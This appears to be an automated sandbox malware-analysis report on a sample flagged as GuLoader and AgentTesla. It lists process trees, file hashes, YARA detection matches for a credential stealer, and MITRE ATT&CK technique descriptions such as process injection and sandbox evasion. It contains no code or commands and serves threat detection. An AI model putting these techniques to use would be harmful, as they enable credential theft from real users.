Imagebase:	0x400000
File size:	21304624 bytes
MD5 hash:	E32061DA9B34B82E0AB5D0E53CAF5A09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: CasPol.exe PID: 2524 Parent PID: 2804

General

Start time:	20:58:28
Start date:	01/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Acly3.exe
Imagebase:	0xda0000
File size:	107680 bytes
MD5 hash:	10FE5178DFC39E15AFE7FED83C7A3B44
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: CasPol.exe PID: 2052 Parent PID: 2804

General

Start time:	20:58:29
Start date:	01/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Acly3.exe
Imagebase:	0xda0000
File size:	107680 bytes
MD5 hash:	10FE5178DFC39E15AFE7FED83C7A3B44
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: CasPol.exe PID: 672 Parent PID: 2804

General

Start time:	20:58:29
Start date:	01/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Acly3.exe
Imagebase:	0xda0000
File size:	107680 bytes
MD5 hash:	10FE5178DFC39E15AFE7FED83C7A3B44
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: misv.exe PID: 2812 Parent PID: 672

General

Start time:	20:59:21
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Roaming\misv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\misv.exe"
Imagebase:	0x400000
File size:	135018 bytes
MD5 hash:	1DA682EC8DCBC375B6E76660EF46D3FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report T81Ip9NCGi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets